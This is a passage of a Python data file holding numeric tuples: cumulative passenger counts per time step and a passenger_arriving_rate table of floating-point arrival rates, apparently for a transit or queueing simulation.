(2077, 1821, 1752, 1832, 1573, 749, 731, 671, 813, 349, 279, 169, 0, 2104, 1803, 1390, 1079, 1625, 908, 766, 571, 783, 612, 334, 170, 0), # 157
(2089, 1827, 1763, 1845, 1581, 753, 733, 672, 816, 353, 282, 171, 0, 2113, 1815, 1400, 1083, 1637, 910, 768, 577, 786, 615, 336, 170, 0), # 158
(2097, 1834, 1768, 1856, 1587, 759, 735, 673, 822, 354, 284, 172, 0, 2122, 1825, 1405, 1087, 1645, 915, 772, 579, 791, 619, 339, 171, 0), # 159
(2102, 1841, 1772, 1860, 1592, 764, 737, 675, 834, 356, 286, 172, 0, 2129, 1833, 1412, 1091, 1654, 919, 776, 583, 798, 624, 340, 171, 0), # 160
(2110, 1847, 1786, 1867, 1603, 771, 740, 677, 839, 359, 286, 173, 0, 2137, 1841, 1416, 1098, 1672, 922, 780, 586, 800, 628, 345, 172, 0), # 161
(2114, 1853, 1796, 1879, 1613, 777, 744, 682, 842, 361, 287, 174, 0, 2149, 1850, 1422, 1104, 1681, 926, 783, 590, 805, 629, 349, 172, 0), # 162
(2122, 1861, 1801, 1893, 1619, 781, 746, 687, 842, 364, 289, 175, 0, 2157, 1859, 1426, 1107, 1688, 930, 785, 592, 808, 630, 350, 172, 0), # 163
(2131, 1871, 1810, 1905, 1625, 786, 749, 690, 844, 365, 289, 176, 0, 2164, 1869, 1431, 1113, 1697, 933, 791, 598, 813, 633, 351, 172, 0), # 164
(2141, 1877, 1821, 1916, 1635, 791, 754, 692, 846, 367, 291, 176, 0, 2173, 1876, 1437, 1119, 1707, 937, 792, 602, 816, 635, 351, 175, 0), # 165
(2150, 1888, 1832, 1924, 1647, 793, 758, 692, 850, 368, 291, 177, 0, 2187, 1881, 1443, 1123, 1712, 945, 795, 602, 819, 636, 354, 176, 0), # 166
(2159, 1894, 1837, 1932, 1659, 802, 760, 693, 856, 369, 292, 178, 0, 2201, 1886, 1445, 1127, 1724, 950, 798, 604, 824, 638, 355, 177, 0), # 167
(2168, 1899, 1843, 1943, 1666, 806, 762, 693, 861, 370, 296, 179, 0, 2213, 1890, 1451, 1132, 1725, 956, 799, 608, 828, 639, 356, 177, 0), # 168
(2179, 1904, 1848, 1950, 1677, 808, 763, 697, 863, 372, 297, 181, 0, 2223, 1902, 1456, 1132, 1730, 959, 801, 610, 831, 642, 358, 178, 0), # 169
(2184, 1907, 1855, 1960, 1685, 810, 764, 697, 865, 376, 298, 183, 0, 2226, 1909, 1461, 1136, 1737, 961, 802, 611, 831, 644, 358, 178, 0), # 170
(2195, 1913, 1864, 1971, 1690, 813, 767, 698, 867, 376, 299, 183, 0, 2235, 1913, 1468, 1140, 1746, 964, 802, 612, 833, 645, 359, 178, 0), # 171
(2204, 1920, 1872, 1978, 1699, 815, 768, 702, 870, 378, 301, 183, 0, 2238, 1918, 1473, 1144, 1749, 966, 804, 614, 836, 646, 359, 178, 0), # 172
(2215, 1925, 1881, 1987, 1702, 816, 768, 703, 878, 380, 302, 184, 0, 2243, 1922, 1482, 1144, 1755, 969, 805, 615, 842, 651, 360, 178, 0), # 173
(2219, 1931, 1886, 1997, 1707, 821, 770, 705, 881, 382, 302, 184, 0, 2251, 1929, 1486, 1149, 1763, 971, 806, 615, 845, 654, 360, 179, 0), # 174
(2224, 1933, 1890, 2001, 1712, 821, 774, 709, 886, 382, 303, 184, 0, 2259, 1934, 1493, 1153, 1769, 974, 808, 620, 848, 654, 361, 179, 0), # 175
(2229, 1942, 1900, 2006, 1713, 822, 775, 712, 890, 384, 304, 185, 0, 2264, 1936, 1495, 1156, 1774, 976, 808, 621, 850, 655, 363, 180, 0), # 176
(2232, 1945, 1908, 2013, 1717, 826, 775, 714, 890, 385, 304, 186, 0, 2272, 1943, 1498, 1162, 1781, 979, 810, 624, 853, 657, 364, 180, 0), # 177
(2233, 1948, 1912, 2019, 1722, 828, 776, 717, 895, 386, 304, 187, 0, 2276, 1951, 1506, 1169, 1788, 982, 812, 627, 856, 660, 364, 180, 0), # 178
(2233, 1948, 1912, 2019, 1722, 828, 776, 717, 895, 386, 304, 187, 0, 2276, 1951, 1506, 1169, 1788, 982, 812, 627, 856, 660, 364, 180, 0), # 179
)
passenger_arriving_rate = (
(7.029211809720476, 7.090786984939564, 6.079830434547925, 6.525401162556605, 5.184373233768971, 2.563234861163827, 2.9022249307617405, 2.7143527675713304, 2.8420462290117365, 1.3853052554328298, 0.9812285382399741, 0.571423425802387, 0.0, 7.117432297609708, 6.285657683826256, 4.90614269119987, 4.155915766298489, 5.684092458023473, 3.8000938745998627, 2.9022249307617405, 1.8308820436884476, 2.5921866168844856, 2.175133720852202, 1.2159660869095852, 0.6446169986308695, 0.0), # 0
(7.496058012827964, 7.558911224152441, 6.4812376898851785, 6.956401465940448, 5.527657648309288, 2.7325532603014207, 3.093628258884586, 2.893049671694997, 3.0297144856220246, 1.4766432422970026, 1.0460557650564308, 0.6091419437616749, 0.0, 7.587708306415797, 6.700561381378422, 5.230278825282154, 4.429929726891007, 6.059428971244049, 4.050269540372995, 3.093628258884586, 1.9518237573581576, 2.763828824154644, 2.3188004886468163, 1.2962475379770357, 0.687173747650222, 0.0), # 1
(7.9614122125716245, 8.025177635976757, 6.881049333138649, 7.385687089898034, 5.869698775499761, 2.9011961768518306, 3.284272955572493, 3.071031394610912, 3.2166338432095234, 1.5676198212571917, 1.1106254013811399, 0.6467104760728565, 0.0, 8.056110759493567, 7.113815236801421, 5.553127006905699, 4.702859463771574, 6.433267686419047, 4.2994439524552766, 3.284272955572493, 2.0722829834655934, 2.9348493877498805, 2.4618956966326784, 1.37620986662773, 0.7295616032706144, 0.0), # 2
(8.423460910405188, 8.487736310818441, 7.277679347539831, 7.811555227908678, 6.209150897601775, 3.0684948417778424, 3.473402549153569, 3.2475923418717962, 3.4020630750965104, 1.657873944449164, 1.1746812960930562, 0.6839799965752206, 0.0, 8.520781928755916, 7.523779962327425, 5.873406480465281, 4.97362183334749, 6.804126150193021, 4.5466292786205145, 3.473402549153569, 2.191782029841316, 3.1045754488008876, 2.6038517426362264, 1.455535869507966, 0.7716123918925856, 0.0), # 3
(8.880390607782374, 8.94473733908341, 7.669541716320211, 8.232303073451698, 6.5446682968767265, 3.233780486042246, 3.6602605679559215, 3.4220269190303676, 3.585260954605263, 1.7470445640086882, 1.2379672980711345, 0.7208014791080559, 0.0, 8.979864086115745, 7.928816270188614, 6.189836490355671, 5.241133692026064, 7.170521909210526, 4.790837686642515, 3.6602605679559215, 2.30984320431589, 3.2723341484383632, 2.7441010244839, 1.5339083432640421, 0.8131579399166738, 0.0), # 4
(9.330387806156915, 9.394330811177607, 8.055050422711272, 8.646227820006413, 6.874905255585995, 3.396384340607826, 3.844090540307657, 3.593629531639346, 3.765486255058061, 1.8347706320715327, 1.300227256194331, 0.7570258975106506, 0.0, 9.43149950348596, 8.327284872617156, 6.501136280971655, 5.504311896214597, 7.530972510116122, 5.031081344295084, 3.844090540307657, 2.4259888147198754, 3.4374526277929975, 2.8820759400021383, 1.6110100845422546, 0.8540300737434189, 0.0), # 5
(9.771639006982534, 9.834666817506942, 8.43261944994451, 9.051626661052135, 7.198516055990973, 3.5556376364373725, 4.024135994536884, 3.7616945852514516, 3.9419977497771805, 1.920691100773466, 1.3612050193415997, 0.7925042256222944, 0.0, 9.87383045277945, 8.717546481845236, 6.806025096707997, 5.762073302320396, 7.883995499554361, 5.266372419352033, 4.024135994536884, 2.5397411688838374, 3.5992580279954867, 3.017208887017379, 1.6865238899889023, 0.8940606197733586, 0.0), # 6
(10.202330711712957, 10.263895448477353, 8.800662781251408, 9.446796790068186, 7.514154980353052, 3.710871604493673, 4.19964045897171, 3.9255164854194056, 4.1140542120849, 2.004444922250256, 1.4206444363918964, 0.8270874372822752, 0.0, 10.304999205909127, 9.097961810105026, 7.103222181959481, 6.013334766750766, 8.2281084241698, 5.495723079587168, 4.19964045897171, 2.6506225746383376, 3.757077490176526, 3.148932263356063, 1.7601325562502819, 0.9330814044070321, 0.0), # 7
(10.62064942180191, 10.68016679449476, 9.157594399863463, 9.830035400533875, 7.820476310933614, 3.8614174757395103, 4.369847461940239, 4.0843896376959234, 4.280914415303496, 2.0856710486376717, 1.4782893562241752, 0.8606265063298821, 0.0, 10.723148034787885, 9.466891569628702, 7.391446781120876, 6.257013145913014, 8.561828830606991, 5.718145492774292, 4.369847461940239, 2.758155339813936, 3.910238155466807, 3.276678466844626, 1.831518879972693, 0.9709242540449783, 0.0), # 8
(11.02478163870312, 11.081630945965095, 9.501828289012156, 10.199639685928528, 8.116134329994049, 4.006606481137679, 4.534000531770584, 4.237608447633729, 4.441837132755248, 2.1640084320714803, 1.5338836277173917, 0.8929724066044035, 0.0, 11.126419211328628, 9.822696472648436, 7.669418138586958, 6.49202529621444, 8.883674265510496, 5.932651826687221, 4.534000531770584, 2.861861772241199, 4.058067164997024, 3.3998798953095104, 1.9003656578024313, 1.0074209950877362, 0.0), # 9
(11.412913863870306, 11.46643799329428, 9.83177843192898, 10.553906839731454, 8.399783319795748, 4.145769851650964, 4.691343196790848, 4.38446732078554, 4.596081137762433, 2.2390960246874507, 1.5871710997505006, 0.923976111945128, 0.0, 11.512955007444255, 10.163737231396405, 7.935855498752503, 6.717288074062351, 9.192162275524867, 6.138254249099756, 4.691343196790848, 2.961264179750688, 4.199891659897874, 3.517968946577152, 1.9663556863857963, 1.0424034539358438, 0.0), # 10
(11.783232598757209, 11.832738026888249, 10.145858811845418, 10.891134055421968, 8.670077562600099, 4.278238818242151, 4.841118985329142, 4.524260662704076, 4.7429052036473305, 2.3105727786213524, 1.6378956212024585, 0.9534885961913449, 0.0, 11.880897695047656, 10.488374558104791, 8.189478106012292, 6.931718335864056, 9.485810407294661, 6.333964927785706, 4.841118985329142, 3.055884870172965, 4.3350387813000495, 3.63037801847399, 2.0291717623690837, 1.075703456989841, 0.0), # 11
(12.133924344817538, 12.178681137152912, 10.442483411992965, 11.209618526479394, 8.925671340668487, 4.403344611874027, 4.9825714257135685, 4.656282878942054, 4.881568103732217, 2.378077646008951, 1.6858010409522184, 0.9813608331823415, 0.0, 12.22838954605175, 10.794969165005755, 8.429005204761092, 7.134232938026852, 9.763136207464434, 6.518796030518876, 4.9825714257135685, 3.1452461513385908, 4.462835670334243, 3.7365395088264655, 2.0884966823985933, 1.107152830650265, 0.0), # 12
(12.463175603505027, 12.502417414494213, 10.720066215603106, 11.507657446383048, 9.165218936262296, 4.520418463509383, 5.11494404627224, 4.779828375052198, 5.011328611339368, 2.441249578986017, 1.7306312078787365, 1.0074437967574077, 0.0, 12.55357283236943, 11.08188176433148, 8.653156039393682, 7.323748736958049, 10.022657222678736, 6.691759725073078, 5.11494404627224, 3.228870331078131, 4.582609468131148, 3.8358858154610167, 2.1440132431206216, 1.136583401317656, 0.0), # 13
(12.769172876273403, 12.802096949318072, 10.977021205907338, 11.783548008612232, 9.387374631642924, 4.6287916041110035, 5.237480375333263, 4.894191556587227, 5.131445499791063, 2.4997275296883177, 1.7721299708609668, 1.0315884607558323, 0.0, 12.85458982591359, 11.347473068314153, 8.860649854304834, 7.499182589064952, 10.262890999582126, 6.8518681792221185, 5.237480375333263, 3.306279717222145, 4.693687315821462, 3.9278493362040785, 2.195404241181468, 1.1638269953925522, 0.0), # 14
(13.050102664576398, 13.075869832030413, 11.211762366137135, 12.035587406646286, 9.590792709071755, 4.72779526464168, 5.349423941224739, 4.998666829099858, 5.241177542409583, 2.5531504502516222, 1.810041178777865, 1.0536457990169035, 0.0, 13.129582798597134, 11.590103789185937, 9.050205893889325, 7.659451350754866, 10.482355084819165, 6.998133560739801, 5.349423941224739, 3.3769966176011996, 4.795396354535877, 4.0118624688820965, 2.242352473227427, 1.1887154392754924, 0.0), # 15
(13.30415146986772, 13.321886153037171, 11.422703679523998, 12.262072833964503, 9.774127450810177, 4.816760676064193, 5.450018272274784, 5.092548598142811, 5.339783512517201, 2.6011572928116995, 1.8441086805083868, 1.0734667853799098, 0.0, 13.376694022332964, 11.808134639179006, 9.220543402541933, 7.803471878435097, 10.679567025034402, 7.1295680373999355, 5.450018272274784, 3.440543340045852, 4.887063725405088, 4.087357611321502, 2.2845407359047996, 1.2110805593670158, 0.0), # 16
(13.529505793601107, 13.538296002744264, 11.608259129299412, 12.46130148404622, 9.936033139119584, 4.895019069341334, 5.538506896811498, 5.17513126926881, 5.426522183436193, 2.643387009504314, 1.874076324931487, 1.09090239368414, 0.0, 13.594065769033982, 11.999926330525538, 9.370381624657433, 7.9301610285129405, 10.853044366872385, 7.245183776976335, 5.538506896811498, 3.496442192386667, 4.968016569559792, 4.153767161348741, 2.3216518258598824, 1.2307541820676606, 0.0), # 17
(13.724352137230287, 13.723249471557619, 11.766842698694862, 12.631570550370744, 10.07516405626135, 4.961901675435895, 5.6141333431629965, 5.245709248030569, 5.500652328488845, 2.6794785524652385, 1.8996879609261188, 1.1058035977688838, 0.0, 13.779840310613086, 12.163839575457718, 9.498439804630594, 8.038435657395715, 11.00130465697769, 7.343992947242797, 5.6141333431629965, 3.5442154824542103, 5.037582028130675, 4.210523516790249, 2.3533685397389728, 1.2475681337779656, 0.0), # 18
(13.88687700220898, 13.874896649883173, 11.896868370941842, 12.77117722641738, 10.190174484496875, 5.0167397253106545, 5.676141139657377, 5.30357693998081, 5.561432720997431, 2.7090708738302403, 1.9206874373712384, 1.1180213714734282, 0.0, 13.932159918983176, 12.298235086207708, 9.603437186856192, 8.12721262149072, 11.122865441994861, 7.425007715973134, 5.676141139657377, 3.5833855180790386, 5.095087242248438, 4.257059075472461, 2.379373674188369, 1.2613542408984704, 0.0), # 19
(14.015266889990915, 13.991387628126835, 11.996750129271838, 12.87841870566547, 10.279718706087547, 5.058864449928407, 5.723773814622755, 5.348028750672253, 5.608122134284226, 2.731802925735086, 1.936818603145802, 1.1274066886370624, 0.0, 14.049166866057154, 12.401473575007685, 9.68409301572901, 8.195408777205257, 11.216244268568452, 7.487240250941153, 5.723773814622755, 3.6134746070917196, 5.139859353043773, 4.292806235221825, 2.399350025854368, 1.2719443298297126, 0.0), # 20
(14.107708302029813, 14.070872496694552, 12.064901956916339, 12.951592181594311, 10.34245100329475, 5.087607080251938, 5.756274896387231, 5.378359085657614, 5.63997934167151, 2.747313660315545, 1.9478253071287643, 1.133810523099076, 0.0, 14.12900342374791, 12.471915754089835, 9.739126535643821, 8.241940980946634, 11.27995868334302, 7.529702719920659, 5.756274896387231, 3.634005057322813, 5.171225501647375, 4.317197393864771, 2.412980391383268, 1.279170226972232, 0.0), # 21
(14.162387739779412, 14.111501345992236, 12.099737837106835, 12.988994847683228, 10.377025658379871, 5.102298847244033, 5.77288791327892, 5.393862350489618, 5.656263116481561, 2.7552420297073854, 1.9534513981990798, 1.1370838486987573, 0.0, 14.16981186396836, 12.50792233568633, 9.7672569909954, 8.265726089122154, 11.312526232963123, 7.551407290685465, 5.77288791327892, 3.644499176602881, 5.188512829189936, 4.329664949227744, 2.419947567421367, 1.282863758726567, 0.0), # 22
(14.182550708679697, 14.116311945587563, 12.104077046181986, 12.993677353395064, 10.385883252297091, 5.104166666666667, 5.774862801581538, 5.395538065843622, 5.658298909465021, 2.7561772953818022, 1.9541568753377396, 1.1374880506020426, 0.0, 14.175, 12.512368556622466, 9.770784376688697, 8.268531886145405, 11.316597818930042, 7.553753292181072, 5.774862801581538, 3.6458333333333335, 5.192941626148546, 4.331225784465023, 2.4208154092363974, 1.283301085962506, 0.0), # 23
(14.197417378247815, 14.113505864197531, 12.10336728395062, 12.99310104166667, 10.390900439373862, 5.104166666666667, 5.773777668845317, 5.393208333333334, 5.658026111111111, 2.755602716049383, 1.9540790684624023, 1.1373934156378602, 0.0, 14.175, 12.51132757201646, 9.77039534231201, 8.266808148148147, 11.316052222222222, 7.550491666666668, 5.773777668845317, 3.6458333333333335, 5.195450219686931, 4.331033680555557, 2.4206734567901242, 1.2830459876543212, 0.0), # 24
(14.211970122296213, 14.10797467992684, 12.101966163694561, 12.991960841049384, 10.39580728255487, 5.104166666666667, 5.771639231824418, 5.388631687242799, 5.657487139917696, 2.754471593507088, 1.9539247931994848, 1.1372065996037193, 0.0, 14.175, 12.509272595640908, 9.769623965997424, 8.263414780521263, 11.314974279835392, 7.544084362139919, 5.771639231824418, 3.6458333333333335, 5.197903641277435, 4.330653613683129, 2.4203932327389124, 1.2825431527206221, 0.0), # 25
(14.226207826667249, 14.099802892089624, 12.099892889803387, 12.990269714506173, 10.400603610526364, 5.104166666666667, 5.768480702816105, 5.381894547325103, 5.65668890946502, 2.7528027480566992, 1.9536954462318665, 1.136930163084896, 0.0, 14.175, 12.506231793933855, 9.768477231159332, 8.258408244170097, 11.31337781893004, 7.534652366255146, 5.768480702816105, 3.6458333333333335, 5.200301805263182, 4.330089904835392, 2.4199785779606775, 1.2818002629172387, 0.0), # 26
(14.240129377203292, 14.089075, 12.097166666666668, 12.988040625, 10.405289251974601, 5.104166666666667, 5.7643352941176484, 5.3730833333333345, 5.655638333333333, 2.7506150000000003, 1.9533924242424245, 1.1365666666666672, 0.0, 14.175, 12.502233333333336, 9.766962121212122, 8.251845, 11.311276666666666, 7.5223166666666685, 5.7643352941176484, 3.6458333333333335, 5.2026446259873005, 4.329346875000001, 2.4194333333333335, 1.280825, 0.0), # 27
(14.253733659746702, 14.075875502972108, 12.093806698673983, 12.985286535493827, 10.40986403558584, 5.104166666666667, 5.759236218026306, 5.362284465020577, 5.654342325102881, 2.7479271696387753, 1.9530171239140377, 1.1361186709343092, 0.0, 14.175, 12.4973053802774, 9.765085619570188, 8.243781508916324, 11.308684650205763, 7.507198251028808, 5.759236218026306, 3.6458333333333335, 5.20493201779292, 4.32842884516461, 2.418761339734797, 1.2796250457247373, 0.0), # 28
(14.26701956013985, 14.060288900320074, 12.089832190214908, 12.982020408950618, 10.41432779004634, 5.104166666666667, 5.753216686839346, 5.349584362139918, 5.652807798353909, 2.7447580772748066, 1.952570941929584, 1.1355887364730988, 0.0, 14.175, 12.491476101204084, 9.76285470964792, 8.234274231824418, 11.305615596707819, 7.489418106995886, 5.753216686839346, 3.6458333333333335, 5.20716389502317, 4.327340136316874, 2.4179664380429817, 1.2782080818472796, 0.0), # 29
(14.279985964225098, 14.042399691358026, 12.085262345679013, 12.978255208333334, 10.418680344042354, 5.104166666666667, 5.746309912854031, 5.335069444444444, 5.651041666666666, 2.7411265432098775, 1.952055274971942, 1.1349794238683129, 0.0, 14.175, 12.48477366255144, 9.760276374859709, 8.223379629629632, 11.302083333333332, 7.469097222222222, 5.746309912854031, 3.6458333333333335, 5.209340172021177, 4.326085069444446, 2.4170524691358026, 1.276581790123457, 0.0), # 30
(14.292631757844802, 14.022292375400093, 12.080116369455878, 12.97400389660494, 10.422921526260142, 5.104166666666667, 5.7385491083676285, 5.318826131687244, 5.649050843621399, 2.737051387745771, 1.9514715197239891, 1.1342932937052284, 0.0, 14.175, 12.477226230757509, 9.757357598619945, 8.211154163237312, 11.298101687242799, 7.4463565843621415, 5.7385491083676285, 3.6458333333333335, 5.211460763130071, 4.324667965534981, 2.416023273891176, 1.2747538523090995, 0.0), # 31
(14.304955826841338, 14.000051451760402, 12.07441346593507, 12.969279436728398, 10.427051165385956, 5.104166666666667, 5.7299674856774, 5.3009408436214, 5.646842242798354, 2.7325514311842714, 1.950821072868604, 1.1335329065691209, 0.0, 14.175, 12.468861972260328, 9.754105364343019, 8.197654293552812, 11.293684485596708, 7.421317181069961, 5.7299674856774, 3.6458333333333335, 5.213525582692978, 4.3230931455761334, 2.4148826931870144, 1.272731950160037, 0.0), # 32
(14.316957057057056, 13.975761419753086, 12.068172839506175, 12.964094791666666, 10.431069090106059, 5.104166666666667, 5.720598257080611, 5.2815, 5.644422777777778, 2.7276454938271613, 1.9501053310886647, 1.1327008230452675, 0.0, 14.175, 12.459709053497942, 9.750526655443322, 8.182936481481482, 11.288845555555556, 7.394100000000001, 5.720598257080611, 3.6458333333333335, 5.215534545053029, 4.321364930555556, 2.413634567901235, 1.2705237654320989, 0.0), # 33
(14.328634334334335, 13.949506778692271, 12.061413694558757, 12.958462924382715, 10.434975129106702, 5.104166666666667, 5.710474634874527, 5.260590020576132, 5.641799362139919, 2.7223523959762237, 1.9493256910670491, 1.1317996037189455, 0.0, 14.175, 12.449795640908398, 9.746628455335244, 8.16705718792867, 11.283598724279837, 7.3648260288065845, 5.710474634874527, 3.6458333333333335, 5.217487564553351, 4.319487641460906, 2.4122827389117516, 1.2681369798811157, 0.0), # 34
(14.339986544515531, 13.92137202789209, 12.054155235482398, 12.952396797839505, 10.438769111074146, 5.104166666666667, 5.699629831356412, 5.238297325102881, 5.638978909465021, 2.7166909579332423, 1.9484835494866362, 1.1308318091754308, 0.0, 14.175, 12.439149900929737, 9.74241774743318, 8.150072873799726, 11.277957818930043, 7.333616255144034, 5.699629831356412, 3.6458333333333335, 5.219384555537073, 4.317465599279836, 2.41083104709648, 1.2655792752629174, 0.0), # 35
(14.35101257344301, 13.891441666666665, 12.04641666666667, 12.945909375, 10.442450864694647, 5.104166666666667, 5.68809705882353, 5.214708333333334, 5.635968333333333, 2.7106800000000004, 1.9475803030303034, 1.1298000000000004, 0.0, 14.175, 12.427800000000001, 9.737901515151515, 8.13204, 11.271936666666665, 7.300591666666668, 5.68809705882353, 3.6458333333333335, 5.221225432347324, 4.315303125000001, 2.409283333333334, 1.2628583333333334, 0.0), # 36
(14.361711306959135, 13.859800194330132, 12.038217192501145, 12.939013618827161, 10.44602021865446, 5.104166666666667, 5.675909529573146, 5.189909465020577, 5.632774547325103, 2.7043383424782816, 1.9466173483809293, 1.1287067367779304, 0.0, 14.175, 12.415774104557233, 9.733086741904645, 8.113015027434844, 11.265549094650206, 7.265873251028808, 5.675909529573146, 3.6458333333333335, 5.22301010932723, 4.313004539609055, 2.407643438500229, 1.259981835848194, 0.0), # 37
(14.372081630906267, 13.826532110196618, 12.029576017375401, 12.931722492283953, 10.449477001639845, 5.104166666666667, 5.663100455902526, 5.1639871399176975, 5.629404465020576, 2.6976848056698683, 1.9455960822213911, 1.1275545800944982, 0.0, 14.175, 12.403100381039478, 9.727980411106955, 8.093054417009604, 11.258808930041152, 7.229581995884776, 5.663100455902526, 3.6458333333333335, 5.224738500819923, 4.3105741640946516, 2.40591520347508, 1.2569574645633292, 0.0), # 38
(14.382122431126781, 13.791721913580247, 12.020512345679016, 12.924048958333334, 10.452821042337057, 5.104166666666667, 5.649703050108934, 5.137027777777778, 5.625865000000001, 2.690738209876544, 1.9445179012345684, 1.1263460905349796, 0.0, 14.175, 12.389806995884772, 9.722589506172842, 8.07221462962963, 11.251730000000002, 7.191838888888889, 5.649703050108934, 3.6458333333333335, 5.226410521168528, 4.308016319444445, 2.4041024691358035, 1.253792901234568, 0.0), # 39
(14.39183259346303, 13.755454103795152, 12.011045381801555, 12.916005979938273, 10.45605216943235, 5.104166666666667, 5.635750524489632, 5.1091177983539104, 5.622163065843623, 2.6835173754000925, 1.943384202103338, 1.125083828684652, 0.0, 14.175, 12.375922115531171, 9.71692101051669, 8.050552126200277, 11.244326131687245, 7.1527649176954755, 5.635750524489632, 3.6458333333333335, 5.228026084716175, 4.305335326646092, 2.4022090763603114, 1.2504958276177414, 0.0), # 40
(14.40121100375738, 13.717813180155463, 12.001194330132604, 12.90760652006173, 10.459170211611989, 5.104166666666667, 5.621276091341887, 5.080343621399178, 5.618305576131687, 2.676041122542296, 1.9421963815105796, 1.1237703551287916, 0.0, 14.175, 12.361473906416705, 9.710981907552897, 8.028123367626886, 11.236611152263373, 7.112481069958849, 5.621276091341887, 3.6458333333333335, 5.229585105805994, 4.302535506687244, 2.400238866026521, 1.2470739254686787, 0.0), # 41
(14.410256547852201, 13.678883641975311, 11.990978395061731, 12.89886354166667, 10.462174997562222, 5.104166666666667, 5.6063129629629636, 5.050791666666668, 5.614299444444446, 2.668328271604939, 1.9409558361391697, 1.122408230452675, 0.0, 14.175, 12.346490534979424, 9.704779180695848, 8.004984814814815, 11.228598888888891, 7.071108333333335, 5.6063129629629636, 3.6458333333333335, 5.231087498781111, 4.299621180555557, 2.3981956790123466, 1.2435348765432102, 0.0), # 42
(14.418968111589852, 13.638749988568819, 11.980416780978512, 12.889790007716051, 10.46506635596931, 5.104166666666667, 5.5908943516501255, 5.020548353909466, 5.61015158436214, 2.660397642889804, 1.9396639626719878, 1.1210000152415793, 0.0, 14.175, 12.331000167657372, 9.698319813359937, 7.981192928669412, 11.22030316872428, 7.0287676954732525, 5.5908943516501255, 3.6458333333333335, 5.232533177984655, 4.296596669238685, 2.3960833561957027, 1.2398863625971654, 0.0), # 43
(14.427344580812699, 13.597496719250115, 11.969528692272522, 12.880398881172843, 10.467844115519508, 5.104166666666667, 5.575053469700638, 4.98970010288066, 5.605868909465021, 2.652268056698675, 1.938322157791911, 1.1195482700807806, 0.0, 14.175, 12.315030970888586, 9.691610788959554, 7.9568041700960235, 11.211737818930041, 6.985580144032924, 5.575053469700638, 3.6458333333333335, 5.233922057759754, 4.293466293724282, 2.3939057384545044, 1.2361360653863744, 0.0), # 44
(14.435384841363105, 13.555208333333335, 11.958333333333336, 12.870703125000002, 10.470508104899077, 5.104166666666667, 5.558823529411765, 4.958333333333334, 5.601458333333333, 2.6439583333333343, 1.9369318181818187, 1.1180555555555556, 0.0, 14.175, 12.29861111111111, 9.684659090909092, 7.931875000000002, 11.202916666666667, 6.941666666666667, 5.558823529411765, 3.6458333333333335, 5.235254052449538, 4.290234375000002, 2.391666666666667, 1.232291666666667, 0.0), # 45
(14.443087779083434, 13.511969330132603, 11.946849908550526, 12.860715702160494, 10.47305815279427, 5.104166666666667, 5.542237743080772, 4.926534465020577, 5.596926769547324, 2.635487293095565, 1.9354943405245877, 1.1165244322511814, 0.0, 14.175, 12.281768754762993, 9.677471702622938, 7.906461879286693, 11.193853539094649, 6.897148251028808, 5.542237743080772, 3.6458333333333335, 5.236529076397135, 4.286905234053499, 2.3893699817101055, 1.228360848193873, 0.0), # 46
(14.45045227981605, 13.46786420896205, 11.935097622313673, 12.850449575617287, 10.475494087891343, 5.104166666666667, 5.525329323004923, 4.894389917695474, 5.592281131687244, 2.6268737562871523, 1.9340111215030973, 1.1149574607529342, 0.0, 14.175, 12.264532068282275, 9.670055607515485, 7.880621268861455, 11.184562263374488, 6.852145884773663, 5.525329323004923, 3.6458333333333335, 5.237747043945672, 4.283483191872429, 2.387019524462735, 1.2243512917238228, 0.0), # 47
(14.457477229403315, 13.422977469135803, 11.923095679012349, 12.839917708333335, 10.477815738876558, 5.104166666666667, 5.508131481481482, 4.861986111111112, 5.587528333333333, 2.618136543209877, 1.9324835578002246, 1.1133572016460909, 0.0, 14.175, 12.246929218106997, 9.662417789001124, 7.854409629629629, 11.175056666666666, 6.806780555555557, 5.508131481481482, 3.6458333333333335, 5.238907869438279, 4.279972569444446, 2.38461913580247, 1.2202706790123459, 0.0), # 48
(14.464161513687602, 13.377393609967992, 11.910863283036125, 12.829133063271607, 10.480022934436168, 5.104166666666667, 5.490677430807714, 4.829409465020577, 5.582675288065844, 2.6092944741655244, 1.930913046098849, 1.1117262155159278, 0.0, 14.175, 12.228988370675204, 9.654565230494246, 7.827883422496572, 11.165350576131688, 6.761173251028807, 5.490677430807714, 3.6458333333333335, 5.240011467218084, 4.276377687757203, 2.382172656607225, 1.2161266918152722, 0.0), # 49
(14.470504018511264, 13.33119713077275, 11.89841963877458, 12.81810860339506, 10.482115503256427, 5.104166666666667, 5.473000383280885, 4.796746399176955, 5.57772890946502, 2.6003663694558763, 1.9293009830818477, 1.1100670629477218, 0.0, 14.175, 12.210737692424937, 9.646504915409238, 7.8010991083676275, 11.15545781893004, 6.715444958847738, 5.473000383280885, 3.6458333333333335, 5.2410577516282135, 4.272702867798355, 2.379683927754916, 1.211927011888432, 0.0), # 50
(14.476503629716676, 13.284472530864198, 11.885783950617286, 12.806857291666669, 10.484093274023598, 5.104166666666667, 5.455133551198258, 4.764083333333335, 5.572696111111112, 2.5913710493827167, 1.9276487654320995, 1.1083823045267494, 0.0, 14.175, 12.192205349794241, 9.638243827160496, 7.774113148148149, 11.145392222222224, 6.669716666666668, 5.455133551198258, 3.6458333333333335, 5.242046637011799, 4.268952430555557, 2.377156790123457, 1.2076793209876546, 0.0), # 51
(14.482159233146191, 13.237304309556471, 11.87297542295382, 12.795392091049385, 10.485956075423934, 5.104166666666667, 5.437110146857097, 4.731506687242798, 5.567583806584363, 2.582327334247829, 1.9259577898324816, 1.1066745008382872, 0.0, 14.175, 12.173419509221157, 9.629788949162407, 7.746982002743485, 11.135167613168726, 6.624109362139918, 5.437110146857097, 3.6458333333333335, 5.242978037711967, 4.265130697016462, 2.3745950845907644, 1.2033913008687704, 0.0), # 52
(14.487469714642183, 13.189776966163697, 11.860013260173757, 12.783725964506175, 10.487703736143693, 5.104166666666667, 5.418963382554669, 4.699102880658437, 5.5623989094650215, 2.573254044352996, 1.9242294529658732, 1.104946212467612, 0.0, 14.175, 12.15440833714373, 9.621147264829364, 7.719762133058986, 11.124797818930043, 6.578744032921811, 5.418963382554669, 3.6458333333333335, 5.243851868071847, 4.261241988168726, 2.3720026520347517, 1.199070633287609, 0.0), # 53
(14.492433960047004, 13.141975000000002, 11.846916666666667, 12.771871875000002, 10.489336084869135, 5.104166666666667, 5.400726470588236, 4.6669583333333335, 5.557148333333334, 2.5641700000000007, 1.9224651515151516, 1.1032000000000002, 0.0, 14.175, 12.1352, 9.612325757575757, 7.69251, 11.114296666666668, 6.533741666666667, 5.400726470588236, 3.6458333333333335, 5.244668042434568, 4.257290625000001, 2.369383333333334, 1.1947250000000003, 0.0), # 54
